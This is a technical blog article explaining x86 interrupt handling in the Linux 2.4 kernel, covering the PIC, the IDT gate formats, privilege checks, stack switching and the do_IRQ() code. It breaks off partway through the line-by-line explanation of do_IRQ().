Sunday, January 22, 2006

Interrupt Handling Internals in Linux Kernel

Author: Gaurav Dhiman
Email :

- Introduction
- CPU Support for Handling Interrupts
- Details of Programmable Interrupt Controller
- Hardware checks performed by CPU
- Details of Interrupt Descriptor Table
- Task Gates
- Trap Gates
- Interrupt Gates
- Hardware checks for Interrupts
- Kernel Support for Handling Interrupts
- Low Level Interrupt Stubs
- Details of do_IRQ() function, core of Interrupt Handling


This article covers the internals of interrupt handling in the Linux kernel. It discusses the hardware perspective of interrupt handling on the CPU, the Linux kernel's interrupt routing subsystem, and the role device drivers play in interrupt handling.

The term interrupt is self-explanatory. Interrupts are signals sent to the CPU on its INTR line whenever a device wants the CPU's attention. As soon as the interrupt signal arrives, the CPU defers its current activity and services the interrupt by executing the interrupt handler corresponding to that interrupt number (also known as the IRQ number).

Interrupts can be classified as follows:
- Synchronous Interrupts (also known as software interrupts)
- Asynchronous Interrupts (also known as hardware interrupts)

The basic difference between the two is that synchronous interrupts are generated by the CPU's control unit when it faces some abnormal condition; these are also known as exceptions in Intel's terminology. They are generated by the CPU itself, either when it detects an abnormal condition or when it executes a special instruction such as 'int' or 'int3'. Asynchronous interrupts, on the other hand, are generated by the outside world (devices connected to the CPU). As these interrupts can occur at any point in time, they are known as asynchronous interrupts.

It is important to note that both synchronous and asynchronous interrupts are handled by the CPU on completion of the instruction during which the interrupt occurs. A machine instruction is not executed in a single CPU cycle; it takes several cycles to complete. An interrupt that occurs in the middle of an instruction is not handled immediately; rather, the CPU checks for interrupts when the instruction completes.

CPU support for handling interrupts

To handle interrupts, there are a few things we expect the CPU to do each time an interrupt occurs. Whenever an interrupt occurs, the CPU performs some hardware checks, which are essential to keep the system secure. Before explaining the hardware checks, we will look at how interrupts are routed from hardware devices to the CPU.

Details of Programmable Interrupt Controller

On the Intel architecture, system devices (device controllers) are connected to a special device known as the PIC (Programmable Interrupt Controller). The CPU has two lines for receiving interrupt signals (NMI and INTR). The NMI line receives non-maskable interrupts: interrupts that cannot be masked, meaning they cannot be blocked at any cost. These interrupts have the highest priority and are rarely used. The INTR line is the line on which all interrupts from system devices are received. These interrupts can be masked or blocked. As all the interrupt signals need to be multiplexed onto a single CPU line, we need some mechanism through which interrupts from different device controllers can be routed to that single line. This routing or multiplexing is done by the PIC. The PIC sits between the system devices and the CPU and has multiple input lines, each connected to a different device controller in the system. On the other side, the PIC has only one output line, which is connected to the CPU's INTR line and on which it signals the CPU.

There are two PICs cascaded together: the output of the second PIC is connected to input line 2 (IRQ2) of the first PIC. This setup allows a maximum of 15 input lines to which different device controllers can be connected. Each PIC has some programmable registers through which the CPU communicates with it (giving commands, masking/unmasking interrupt lines, reading status). Both PICs have the following registers of their own:

- Mask Register
- Status Register

The mask register is used to mask/unmask a specific interrupt line. The CPU can ask the PIC to mask (block) a specific interrupt by setting the corresponding bit in the mask register. Unmasking is done by clearing that bit. While a particular interrupt is masked, the PIC still receives interrupts on the corresponding line but does not forward them to the CPU, so the CPU keeps doing what it was doing. Masked interrupts are not lost; the PIC remembers them and sends the interrupt to the CPU once the CPU unmasks that interrupt line. Masking is different from blocking all interrupts to the CPU. The CPU can ignore all interrupts arriving on the INTR line by clearing the IF flag in its EFLAGS register. While this bit is cleared, interrupts arriving on the INTR line are simply ignored by the CPU; we can consider this to be blocking of interrupts. So masking is done at the PIC level, where individual interrupt lines can be masked or unmasked, whereas blocking is done at the CPU level and applies to all interrupts except the NMI (Non-Maskable Interrupt), which is received on the CPU's NMI line and cannot be blocked or ignored.
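The difference between masking at the PIC and blocking at the CPU can be sketched with a small software model. This is only an illustration under stated assumptions: the struct pic_model type and the pic_* helpers are hypothetical names invented here, and the model does not program a real PIC.

```c
#include <stdint.h>
#include <stdbool.h>

/* Hypothetical software model of one PIC (not real controller programming). */
struct pic_model {
    uint8_t mask;     /* bit n set => input line n is masked at the PIC      */
    uint8_t pending;  /* bit n set => line n raised a request not yet sent   */
};

/* Mask (block) one input line by setting its bit in the mask register. */
static void pic_mask_line(struct pic_model *pic, unsigned line)
{
    pic->mask |= (uint8_t)(1u << line);
}

/* Unmask one input line by clearing its bit in the mask register. */
static void pic_unmask_line(struct pic_model *pic, unsigned line)
{
    pic->mask &= (uint8_t)~(1u << line);
}

/* A device raises its line; the request is remembered even if masked. */
static void pic_raise(struct pic_model *pic, unsigned line)
{
    pic->pending |= (uint8_t)(1u << line);
}

/*
 * Returns the lowest-numbered line that can be delivered right now, or -1.
 * cpu_if models the IF flag: when it is false the CPU ignores INTR entirely,
 * whatever the PIC mask register says.
 */
static int pic_deliver(struct pic_model *pic, bool cpu_if)
{
    uint8_t ready = pic->pending & (uint8_t)~pic->mask;

    if (!cpu_if || ready == 0)
        return -1;
    for (unsigned line = 0; line < 8; line++) {
        if (ready & (1u << line)) {
            pic->pending &= (uint8_t)~(1u << line);
            return (int)line;
        }
    }
    return -1;
}
```

In this model a request raised on a masked line stays in the pending bits and is delivered only after the line is unmasked and the modelled IF flag is set.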

Nowadays the interrupt architecture is not as simple as described above. Modern machines use the APIC (Advanced Programmable Interrupt Controller) architecture, which can support up to 256 interrupt vectors. In this architecture an I/O APIC collects interrupts from devices, and every CPU has its own built-in local APIC. We won't go into the details of these right now (they will be covered in future articles).

Hardware checks performed by CPU

Once the interrupt signal is received, the CPU performs some hardware checks for which no software instructions are executed. Before looking at what these checks are, we need to understand some architecture-specific data structures maintained by the kernel.

Details of Interrupt Descriptor Table

The kernel needs to maintain one IDT (Interrupt Descriptor Table), which maps each interrupt number to its interrupt handler routine. This table has 256 entries of 8 bytes each. The first 32 entries are used for exceptions and the rest are used for hardware interrupts received from the outside world. The table can contain three different types of entries:

- Task Gates
- Trap Gates
- Interrupt Gates

Let's see what these gates are and where they are used.

Task Gates

Format of task gate entry is as follows:
- 0-15 bits ---- reserved (not used)
- 16-31 bits ---- points to the TSS (Task State Segment) entry of the process to which we need to switch.
- 32-39 bits ---- these bits are reserved and are not currently used.
- 40-43 bits ---- specify the type of entry (its value for task gate is 0101)
- 44th bit ---- always 0, not used
- 45-46 bits ---- this specifies the DPL (Descriptor Privilege Level) of the gate entry.
- 47th bit ---- specifies if this entry is valid or not (1 - valid, 0 - invalid)
- 48-63 bits ---- reserved (not used)

Task gates are used in the IDT to allow a user process to make a context switch to another process without requesting the kernel to do it. As soon as this gate is hit (an interrupt is received on a line for which there is a task gate in the IDT), the CPU saves the context (state of the processor registers) of the currently running process to the TSS of the current process, whose address is held in the CPU's TR (Task Register). After saving the context of the current process, the CPU loads its registers with the values stored in the TSS of the new process, which is identified by bits 16-31 of the task gate. Once the registers are loaded with these new values, the processor is running the new process and the context switch is done. Linux does not use task gates; it only uses trap and interrupt gates in the IDT, so I will not explain task gates any further.

Trap Gates

The format of a trap gate is as follows:
- 0-15 bits ---- low 16 bits of the pointer to the kernel function which needs to be invoked when this gate is hit
- 16-31 bits ---- indicates the index of the segment descriptor in the GDT (Global Descriptor Table)
- 32-36 bits ---- these bits are reserved and are not currently used.
- 37-39 bits ---- always 000, not used
- 40-43 bits ---- specify the type of entry (its value for a trap gate is 1111)
- 44th bit ---- always 0, not used
- 45-46 bits ---- this specifies the DPL (Descriptor Privilege Level) of the gate entry.
- 47th bit ---- specifies if this entry is valid or not (1 - valid, 0 - invalid)
- 48-63 bits ---- high 16 bits of the pointer to the kernel function which needs to be invoked when this gate is hit

Trap gates are used to handle exceptions generated by the CPU. Bits 0-15 and bits 48-63 together form the pointer (an offset in the segment identified by bits 16-31 of this entry) to a kernel function. The only difference between trap gates and interrupt gates is that whenever an interrupt gate is hit, the CPU automatically disables interrupts by clearing the IF flag in its EFLAGS register, whereas for a trap gate this is not done and interrupts remain enabled. As mentioned earlier, trap gates are used for exceptions, so the first 32 entries in the IDT are initialized with trap gates. In addition, the Linux kernel also uses a trap gate for the system call entry (entry 128 of the IDT).

Interrupt Gates

The format of an interrupt gate is the same as that of the trap gate explained above, except for the value of the type field (bits 40-43). For trap gates this field has the value 1111, and for interrupt gates it is 1110.

The format is as follows:
- 0-15 bits ---- low 16 bits of the pointer to the kernel function which needs to be invoked when this gate is hit
- 16-31 bits ---- indicates the index of the segment descriptor in the GDT (Global Descriptor Table)
- 32-36 bits ---- these bits are reserved and are not currently used.
- 37-39 bits ---- always 000, not used
- 40-43 bits ---- specify the type of entry (its value for an interrupt gate is 1110)
- 44th bit ---- always 0, not used
- 45-46 bits ---- this specifies the DPL (Descriptor Privilege Level) of the gate entry.
- 47th bit ---- specifies if this entry is valid or not (1 - valid, 0 - invalid)
- 48-63 bits ---- high 16 bits of the pointer to the kernel function which needs to be invoked when this gate is hit

Note: whenever an interrupt gate is hit, interrupts are disabled automatically.
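The bit layout listed for trap and interrupt gates can be sketched as a function that packs the fields into one 64-bit value. This is a minimal illustration, not the kernel's own code: make_gate() and the gate_* accessors are hypothetical helpers, and the handler address and selector used with them are made-up example values.

```c
#include <stdint.h>

#define GATE_TYPE_TASK      0x5u  /* 0101 */
#define GATE_TYPE_INTERRUPT 0xEu  /* 1110 */
#define GATE_TYPE_TRAP      0xFu  /* 1111 */

/* Hypothetical helper: pack a trap/interrupt gate from its fields. */
static uint64_t make_gate(uint32_t offset, uint16_t selector,
                          unsigned type, unsigned dpl)
{
    uint64_t gate = 0;

    gate |= (uint64_t)(offset & 0xFFFFu);      /* bits 0-15 : low half of handler offset  */
    gate |= (uint64_t)selector << 16;          /* bits 16-31: code segment selector       */
    gate |= (uint64_t)(type & 0xFu) << 40;     /* bits 40-43: gate type                   */
    gate |= (uint64_t)(dpl & 0x3u) << 45;      /* bits 45-46: DPL of the gate             */
    gate |= (uint64_t)1 << 47;                 /* bit 47    : entry is valid (present)    */
    gate |= (uint64_t)(offset >> 16) << 48;    /* bits 48-63: high half of handler offset */
    return gate;
}

/* Reassemble the 32-bit handler offset from the two halves of the gate. */
static uint32_t gate_offset(uint64_t gate)
{
    return (uint32_t)(gate & 0xFFFFu) | ((uint32_t)(gate >> 48) << 16);
}

static unsigned gate_type(uint64_t gate)
{
    return (unsigned)((gate >> 40) & 0xFu);
}

static unsigned gate_dpl(uint64_t gate)
{
    return (unsigned)((gate >> 45) & 0x3u);
}
```

For example, make_gate(0xC0108ABC, 0x10, GATE_TYPE_INTERRUPT, 0) yields 0xC0108E0000108ABC; the same call with GATE_TYPE_TRAP and a DPL of 3 differs only in the byte holding bits 40-47, which becomes 0xEF instead of 0x8E.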

Hardware Checks for Interrupts and Exceptions

Whenever an exception or interrupt occurs, the corresponding trap/interrupt gate is hit and the CPU performs some checks using the fields of that gate. The CPU does the following:

1). Gets the ith entry from the IDT (the linear base address and size of the IDT are stored in the CPU's IDTR register); here 'i' is the interrupt number.

2). Reads the segment descriptor index from bits 16-31 of the IDT entry; let's call it 'n'.

3). Gets the segment descriptor from the nth entry in the GDT (the linear base address and size of the GDT are stored in the CPU's GDTR register).

4). The DPL of the nth entry in the GDT must be less than or equal to the CPL (Current Privilege Level, held in the read-only lowermost two bits of the CS register). If DPL > CPL, the CPU generates a general protection exception. We will see below what this check means and why it is done. Put simply:
a). DPL (of GDT entry) <= CPL ----- ok, switches stack if DPL < CPL
b). DPL (of GDT entry) > CPL ----- general protection exception
If DPL (of GDT entry) < CPL, we are entering a higher privilege level (probably going from user to kernel mode). In this case the CPU switches the hardware stack (SS and ESP registers) from the currently running process's user mode stack to its kernel mode stack. We will see below exactly how this stack switch is done. Note: the stack switch is mentioned here, but it actually happens after the 5th step below.

5). For software interrupts (generated by the assembly instruction 'int'), one more check is done. This check is not performed for hardware interrupts (interrupts generated by system devices and forwarded by the PIC). Put simply:
a). DPL (of IDT entry) >= CPL ---- ok, we have permission to enter through this gate
b). DPL (of IDT entry) < CPL ---- general protection exception

6). Switches the stack if DPL (of GDT entry) < CPL. In addition, the CPU's privilege level (least significant two bits of CS) is changed from CPL to DPL (of GDT entry).

7). If the stack switch has taken place (SS and ESP registers reset to the kernel stack), pushes the old values of SS and ESP (pointing to the user stack) onto the new stack (kernel stack).

8). Pushes the EFLAGS, CS and EIP registers onto the stack (note: we are now working on the kernel stack). This saves the pointer to the user application instruction to which we need to return after servicing the interrupt or exception.

9). In the case of exceptions, if there is a hardware error code, the processor pushes that onto the kernel stack as well.

10). Loads CS with the segment selector from the IDT entry (bits 16-31) and EIP with the offset from the IDT entry (bits 0-15 + bits 48-63).

All of the above is done by the CPU hardware without executing any software instruction. The checks performed in the 4th and 5th steps are important.

The 4th check makes sure that the code we are going to execute (the Interrupt Service Routine) does not lie in a segment with lesser privilege. Obviously the ISR cannot be in a less privileged segment than the one we are currently in. DPL and CPL can take 4 values (0, 1, 2 for kernel mode and 3 for user mode). Out of these four, only two are used: 0 (for kernel mode) and 3 (for user mode).

The 5th check makes sure that an application can enter kernel mode through specific gates only; in Linux, only through the 128th gate entry, which is for system call invocation. If we set the DPL field of an IDT entry to 0, 1 or 2, an application program (running with CPL 3) cannot enter through that gate entry. If it tries, the CPU generates a general protection exception. This is why, in Linux, the DPL fields of all IDT entries (except the 128th entry used for system calls) are initialized to '0'; this makes sure only kernel code can access these gates, not application code. In Linux the 128th entry (used for system calls) is a trap gate and its DPL value is initialized to 3, so that application code can enter through this gate with the assembly instruction "int 0x80".
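The 4th and 5th checks, together with the stack switch decision, can be written down as a small decision function. This is a sketch of the rules as described in this article, not processor microcode; check_gate() and enum gate_result are hypothetical names.

```c
#include <stdbool.h>

enum gate_result {
    GATE_OK,               /* enter the handler on the current stack        */
    GATE_OK_STACK_SWITCH,  /* enter the handler after switching stacks      */
    GATE_GP_FAULT          /* general protection exception                  */
};

/*
 * cpl          : current privilege level (low two bits of CS)
 * segment_dpl  : DPL of the GDT entry selected by the gate
 * gate_dpl     : DPL of the IDT entry itself
 * software_int : true for 'int n' instructions, false for hardware interrupts
 */
static enum gate_result check_gate(unsigned cpl, unsigned segment_dpl,
                                   unsigned gate_dpl, bool software_int)
{
    /* 4th check: the handler's segment must not be less privileged than us. */
    if (segment_dpl > cpl)
        return GATE_GP_FAULT;

    /* 5th check: only applied to software interrupts. */
    if (software_int && gate_dpl < cpl)
        return GATE_GP_FAULT;

    /* Entering a more privileged level requires a stack switch. */
    return (segment_dpl < cpl) ? GATE_OK_STACK_SWITCH : GATE_OK;
}
```

With these rules, a user process (CPL 3) executing "int 0x80" against a gate with DPL 3 is admitted with a stack switch, while the same process executing 'int' against a gate with DPL 0 gets a general protection exception. A hardware interrupt arriving while in user mode skips the 5th check and is admitted.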

Now let's see how the stack switch happens when DPL (of GDT entry) < CPL. The CPU has a TR (Task Register), which points to the TSS (Task State Segment) of the currently running process. The TSS is an architecture-defined data structure which holds the state of the processor registers whenever a context switch of this process happens. The TSS includes three sets of SS and ESP fields, one for each processor level 0, 1 and 2. These fields specify the stack to be used whenever we enter that processor level. Let's say the DPL value in the GDT entry is 0; in this case the CPU loads the SS register with the value of the level 0 SS field in the TSS and the ESP register with the value of the level 0 ESP field in the TSS. After loading SS and ESP with these values, the CPU is pointing to the kernel level stack of the current process. The old values of SS and ESP (which the CPU has kept internally) are now pushed onto this new kernel level stack; this is done because we need to return to the old stack once we have serviced the interrupt, exception or system call. Prudent readers must be wondering why there is no field for a level 3 stack in the TSS. The reason is that we never use the CPU's stack switching mechanism to switch from a higher CPU level (kernel mode - 0, 1 and 2) to a lower CPU level (user mode - 3). This is why the CPU, while entering the higher level (kernel mode), saves the previously used lower level stack (user mode) on the kernel stack.
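The order in which values land on the kernel stack during a user to kernel transition can be modelled in a few lines. This is only a sketch under stated assumptions: the cpu_model and kstack_model types and enter_kernel() are hypothetical, the register values used with them are made up, and details such as the error code and the clearing of IF are left out.

```c
#include <stdint.h>
#include <stddef.h>

#define KSTACK_WORDS 16

/* Hypothetical model of the registers involved in the switch. */
struct cpu_model {
    uint32_t ss, esp, eflags, cs, eip;
};

/* Hypothetical kernel stack that grows downwards from KSTACK_WORDS. */
struct kstack_model {
    uint32_t words[KSTACK_WORDS];
    size_t top;  /* index of the last pushed word; KSTACK_WORDS when empty */
};

static void kpush(struct kstack_model *ks, uint32_t value)
{
    ks->words[--ks->top] = value;
}

/* Enter level 0 from user mode, using the level 0 SS/ESP taken from the TSS. */
static void enter_kernel(struct cpu_model *cpu, struct kstack_model *ks,
                         uint32_t tss_ss0, uint32_t tss_esp0,
                         uint32_t handler_cs, uint32_t handler_eip)
{
    /* The CPU keeps the old stack pointer internally across the switch. */
    uint32_t old_ss = cpu->ss;
    uint32_t old_esp = cpu->esp;

    cpu->ss = tss_ss0;          /* switch to the kernel stack             */
    cpu->esp = tss_esp0;
    ks->top = KSTACK_WORDS;     /* modelled kernel stack starts out empty */

    kpush(ks, old_ss);          /* saved user SS                          */
    kpush(ks, old_esp);         /* saved user ESP                         */
    kpush(ks, cpu->eflags);     /* saved EFLAGS                           */
    kpush(ks, cpu->cs);         /* saved user CS                          */
    kpush(ks, cpu->eip);        /* saved user EIP (return address)        */
    cpu->esp = tss_esp0 - 5 * 4;

    cpu->cs = handler_cs;       /* finally jump to the handler            */
    cpu->eip = handler_eip;
}
```

After the call, the modelled kernel stack holds five 32-bit words, with the user SS pushed first and the user EIP on top, which is the frame the return path later uses to get back to the user stack.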

Once all this CPU action is done, the CPU's CS and EIP registers point to the kernel function written for handling the interrupt or exception. The CPU simply starts executing instructions from this point (we are now in kernel mode - level 0).

Kernel Support for Handling Interrupts

In this section, we will walk through the kernel code executed in interrupt context. I will be referring to the code as of the 2.4.18 release of the kernel.

Low Level Interrupt Stubs

Whenever an interrupt occurs, the CPU performs the hardware checks described above and starts executing the following assembly instructions in the kernel, whose pointer (offset in the kernel code segment) is stored in the corresponding IDT entry.

File: include/asm-i386/hw_irq.h

#define BUILD_COMMON_IRQ() \
asmlinkage void call_do_IRQ(void); \
__asm__( \
        "\n" __ALIGN_STR"\n" \
        "common_interrupt:\n\t" \
        SAVE_ALL \
        SYMBOL_NAME_STR(call_do_IRQ)":\n\t" \
        "call " SYMBOL_NAME_STR(do_IRQ) "\n\t" \
        "jmp ret_from_intr\n");

#define BUILD_IRQ(nr) \
asmlinkage void IRQ_NAME(nr); \
__asm__( \
"\n"__ALIGN_STR"\n" \
SYMBOL_NAME_STR(IRQ) #nr "_interrupt:\n\t" \
        "pushl $"#nr"-256\n\t" \
        "jmp common_interrupt");


These macros are expanded when the kernel is compiled to generate the lowest-level interrupt stubs, which are reached from the IDT by saving their offsets (pointers) in IDT gates. The kernel maintains one global array of function pointers (named "interrupt") in which it stores the pointers to these stubs. The code that creates these stubs (using the BUILD_IRQ macro shown above) and saves their pointers in the global array "interrupt[NR_IRQS]" can be seen in the file "arch/i386/kernel/i8259.c". In this file you will see the BUILD_IRQ macro used to create the interrupt stubs as follows:

File: arch/i386/kernel/i8259.c

#define BI(x,y) \
        BUILD_IRQ(x##y)

#define BUILD_16_IRQS(x) \
        BI(x,0) BI(x,1) BI(x,2) BI(x,3) \
        BI(x,4) BI(x,5) BI(x,6) BI(x,7) \
        BI(x,8) BI(x,9) BI(x,a) BI(x,b) \
        BI(x,c) BI(x,d) BI(x,e) BI(x,f)

/*
 * ISA PIC or low IO-APIC triggered (INTA-cycle or APIC) interrupts:
 * (these are usually mapped to vectors 0x20-0x2f)
 */
BUILD_16_IRQS(0x0)

#ifdef CONFIG_X86_IO_APIC
/*
 * The IO-APIC gives us many more interrupt sources. Most of these
 * are unused but an SMP system is supposed to have enough memory ...
 * sometimes (mostly wrt. hw bugs) we get corrupted vectors all
 * across the spectrum, so we really want to be prepared to get all
 * of these. Plus, more powerful systems might have more than 64
 * IO-APIC registers.
 *
 * (these are usually mapped into the 0x30-0xff vector range)
 */
                   BUILD_16_IRQS(0x1) BUILD_16_IRQS(0x2) BUILD_16_IRQS(0x3)
BUILD_16_IRQS(0x4) BUILD_16_IRQS(0x5) BUILD_16_IRQS(0x6) BUILD_16_IRQS(0x7)
BUILD_16_IRQS(0x8) BUILD_16_IRQS(0x9) BUILD_16_IRQS(0xa) BUILD_16_IRQS(0xb)
BUILD_16_IRQS(0xc) BUILD_16_IRQS(0xd)
#endif

#undef BUILD_16_IRQS
#undef BI


The above code creates the interrupt stubs but does not place their pointers in the interrupt[NR_IRQS] array. The code which places the pointers to these stubs in the global array is as follows and can be found in the same file, "arch/i386/kernel/i8259.c":

File: arch/i386/kernel/i8259.c

#define IRQ(x,y) \
        IRQ##x##y##_interrupt

#define IRQLIST_16(x) \
        IRQ(x,0), IRQ(x,1), IRQ(x,2), IRQ(x,3), \
        IRQ(x,4), IRQ(x,5), IRQ(x,6), IRQ(x,7), \
        IRQ(x,8), IRQ(x,9), IRQ(x,a), IRQ(x,b), \
        IRQ(x,c), IRQ(x,d), IRQ(x,e), IRQ(x,f)

void (*interrupt[NR_IRQS])(void) = {
        IRQLIST_16(0x0),

#ifdef CONFIG_X86_IO_APIC
                         IRQLIST_16(0x1), IRQLIST_16(0x2), IRQLIST_16(0x3),
        IRQLIST_16(0x4), IRQLIST_16(0x5), IRQLIST_16(0x6), IRQLIST_16(0x7),
        IRQLIST_16(0x8), IRQLIST_16(0x9), IRQLIST_16(0xa), IRQLIST_16(0xb),
        IRQLIST_16(0xc), IRQLIST_16(0xd)
#endif
};

#undef IRQ
#undef IRQLIST_16


The above code fills the global array of function pointers (interrupt[NR_IRQS]). Once the global array is initialized with the pointers to the interrupt stubs, we initialize the IDT (Interrupt Descriptor Table) in the function "init_IRQ()" using this global array as follows:
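The token-pasting trick used by BUILD_16_IRQS and IRQLIST_16 can be tried outside the kernel. The following sketch generates sixteen plain C functions instead of assembly stubs and collects them in a table in the same way; BUILD_STUB, BS, BUILD_16_STUBS, STUB, STUBLIST_16, stub_table and last_irq are all hypothetical names chosen for this illustration.

```c
#include <stddef.h>

/* Records which stub ran last (illustration only). */
static int last_irq = -1;

/* Define one function named IRQ<nr>_stub, e.g. IRQ0x0a_stub. */
#define BUILD_STUB(nr) \
static void IRQ##nr##_stub(void) { last_irq = nr; }

/* Paste the group prefix and the digit together: BS(0x0, a) -> 0x0a. */
#define BS(x, y) BUILD_STUB(x##y)

#define BUILD_16_STUBS(x) \
    BS(x, 0) BS(x, 1) BS(x, 2) BS(x, 3) \
    BS(x, 4) BS(x, 5) BS(x, 6) BS(x, 7) \
    BS(x, 8) BS(x, 9) BS(x, a) BS(x, b) \
    BS(x, c) BS(x, d) BS(x, e) BS(x, f)

BUILD_16_STUBS(0x0)

/* Rebuild the same names to fill the table of function pointers. */
#define STUB(x, y) IRQ##x##y##_stub

#define STUBLIST_16(x) \
    STUB(x, 0), STUB(x, 1), STUB(x, 2), STUB(x, 3), \
    STUB(x, 4), STUB(x, 5), STUB(x, 6), STUB(x, 7), \
    STUB(x, 8), STUB(x, 9), STUB(x, a), STUB(x, b), \
    STUB(x, c), STUB(x, d), STUB(x, e), STUB(x, f)

#define NR_STUBS 16

static void (*stub_table[NR_STUBS])(void) = {
    STUBLIST_16(0x0)
};

#undef STUB
#undef STUBLIST_16
#undef BS
#undef BUILD_16_STUBS
```

Calling stub_table[i]() for any i from 0 to 15 runs the function generated for IRQ i, which is the property the kernel relies on when it copies interrupt[i] into the IDT.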

File: arch/i386/kernel/i8259.c, Function: init_IRQ()

for (i = 0; i < (NR_VECTORS - FIRST_EXTERNAL_VECTOR); i++) {
        int vector = FIRST_EXTERNAL_VECTOR + i;
        if (i >= NR_IRQS)
                break;
        if (vector != IA32_SYSCALL_VECTOR && vector != KDB_VECTOR) {
                set_intr_gate(vector, interrupt[i]);
        }
}


In the above loop, we iterate over the IDT entries starting from "FIRST_EXTERNAL_VECTOR" (32, because the first 32 entries are for exceptions) and call the "set_intr_gate()" function, which sets the interrupt gate descriptor. For entry 128, which is for system call invocation, an interrupt gate is not set; a trap gate is set instead, and that is done in the function trap_init(). In the same function init_IRQ(), after this loop, we initialize the IPIs (Interprocessor Interrupts). These interrupts are sent from one CPU to another on SMP machines.

Once these IDT entries are set, whenever an interrupt occurs the CPU jumps directly to the code generated by the BUILD_IRQ macro. Now let's analyse what this macro does. Following is the code for the BUILD_IRQ macro:

File: include/asm-i386/hw_irq.h

#define BUILD_IRQ(nr) \
asmlinkage void IRQ_NAME(nr); \
__asm__( \
"\n.p2align\n" \
"IRQ" #nr "_interrupt:\n\t" \
        "push $" #nr "-256 ; " \
        "jmp common_interrupt");


This assembly code first subtracts 256 from the IRQ number and pushes the (negative) result onto the kernel stack. After doing this it jumps to the "common_interrupt" assembly label, which saves the context of the interrupted process (CPU registers) onto the kernel stack and then calls the C language function "do_IRQ()".
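The arithmetic behind the pushed value is easy to check in isolation: the stub pushes the IRQ number minus 256, and do_IRQ() later recovers the IRQ number by keeping only the low 8 bits of that value. The two helper functions below are hypothetical names used only to demonstrate this round trip.

```c
#include <stdint.h>

/* Value the stub pushes: the IRQ number minus 256 (negative for 0..255). */
static int32_t stub_pushed_value(unsigned nr)
{
    return (int32_t)nr - 256;
}

/* What do_IRQ() does with the saved value: keep only the low 8 bits. */
static unsigned irq_from_orig_eax(int32_t orig_eax)
{
    return (unsigned)orig_eax & 0xff;
}
```

For IRQ 3 the stub pushes -253, which is 0xFFFFFF03 as a 32-bit two's complement value, and masking with 0xff gives back 3.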

Details of do_IRQ() function, core of Interrupt Handling

do_IRQ() is the function common to all hardware interrupts. It is the most important function to understand from the perspective of interrupt handling. We will first show the code of the whole function and then explain it in the coming paragraphs, with references to its line numbers.

File: arch/i386/kernel/irq.c

563 asmlinkage unsigned int do_IRQ(struct pt_regs regs)
564 {
565         /*
566          * We ack quickly, we don't want the irq controller
567          * thinking we're snobs just because some other CPU has
568          * disabled global interrupts (we have already done the
569          * INT_ACK cycles, it's too late to try to pretend to the
570          * controller that we aren't taking the interrupt).
571          *
572          * 0 return value means that this irq is already being
573          * handled by some other CPU. (or is disabled)
574          */
575         int irq = regs.orig_eax & 0xff; /* high bits used in ret_from_ code */
576         int cpu = smp_processor_id();
577         irq_desc_t *desc = irq_desc + irq;
578         struct irqaction * action;
579         unsigned int status;
581         kstat.irqs[cpu][irq]++;
582         spin_lock(&desc->lock);
583         desc->handler->ack(irq);
584         /*
585            REPLAY is when Linux resends an IRQ that was dropped earlier
586            WAITING is used by probe to mark irqs that are being tested
587            */
588         status = desc->status & ~(IRQ_REPLAY | IRQ_WAITING);
589         status |= IRQ_PENDING; /* we _want_ to handle it */
591         /*
592          * If the IRQ is disabled for whatever reason, we cannot
593          * use the action we have.
594          */
595         action = NULL;
596         if (!(status & (IRQ_DISABLED | IRQ_INPROGRESS))) {
597                 action = desc->action;
598                 status &= ~IRQ_PENDING; /* we commit to handling */
599                 status |= IRQ_INPROGRESS; /* we are handling it */
600         }
601         desc->status = status;
603         /*
604          * If there is no IRQ handler or it was disabled, exit early.
605            Since we set PENDING, if another processor is handling
606            a different instance of this same irq, the other processor
607            will take care of it.
608          */
609         if (!action)
610                 goto out;
612         /*
613          * Edge triggered interrupts need to remember
614          * pending events.
615          * This applies to any hw interrupts that allow a second
616          * instance of the same irq to arrive while we are in do_IRQ
617          * or in the handler. But the code here only handles the _second_
618          * instance of the irq, not the third or fourth. So it is mostly
619          * useful for irq hardware that does not mask cleanly in an
620          * SMP environment.
621          */
622         for (;;) {
623                 spin_unlock(&desc->lock);
624                 handle_IRQ_event(irq, &regs, action);
625                 spin_lock(&desc->lock);
627                 if (!(desc->status & IRQ_PENDING))
628                         break;
629                 desc->status &= ~IRQ_PENDING;
630         }
631         desc->status &= ~IRQ_INPROGRESS;
632 out:
633         /*
634          * The ->end() handler has to deal with interrupts which got
635          * disabled while the handler was running.
636          */
637         desc->handler->end(irq);
638         spin_unlock(&desc->lock);
640         if (softirq_pending(cpu))
641                 do_softirq();
642         return 1;
643 }


Here is the detailed explanation of the do_IRQ() function, line by line.

Line - 575 to 577
Get the number of the interrupt that was triggered. It was pushed onto the kernel stack before the context of the interrupted process was pushed. Get the id of the CPU on which this code is executing, in other words the id of the processor handling this interrupt. Get the pointer to the IRQ descriptor. The IRQ descriptor is a kernel data structure which binds together the different ISRs (Interrupt Service Routines) registered by device drivers for the same IRQ line. The same IRQ line can be shared between different devices, so their device drivers need to register their own ISRs to handle the interrupts generated by these devices. The IRQ descriptor data structure is defined as follows:

typedef struct {
        unsigned int status;
        hw_irq_controller *handler;
        struct irqaction *action;
        unsigned int depth;
        spinlock_t lock;
} ____cacheline_aligned irq_desc_t;

Following is the significance of the different elements in this structure:

- status : It is a bit mask of different flags identifying the state of a particular IRQ line. We will see the use of the different flags later in this article.

- handler : This is the pointer to a structure whose elements are pointers to the functions that deal with the physical PIC (programmable interrupt controller). These functions are used to mask/unmask a particular interrupt line in the PIC or to acknowledge the interrupt to the PIC. The definitions of these PIC related functions can be found in the file "arch/i386/kernel/i8259.c"

- action : This element is the pointer to the list of ISRs registered by different device drivers for this IRQ line. When a device driver registers its ISR with the kernel using the kernel function "request_irq()", the ISR is added to this list for that particular IRQ line.

- lock : This is the spinlock that handles synchronization while accessing any element of the IRQ descriptor. Kernel execution contexts access the different elements of the IRQ descriptor, but before doing so they must acquire this spinlock so that synchronization is maintained.

Line - 581 to 583
Here we increment the count of interrupts received by this CPU; this is maintained for accounting purposes. We then take the spinlock before accessing any element of the IRQ descriptor for our interrupt line. We also mask and acknowledge the interrupt to the PIC using the handler functions of our IRQ descriptor.

Line - 588 to 589
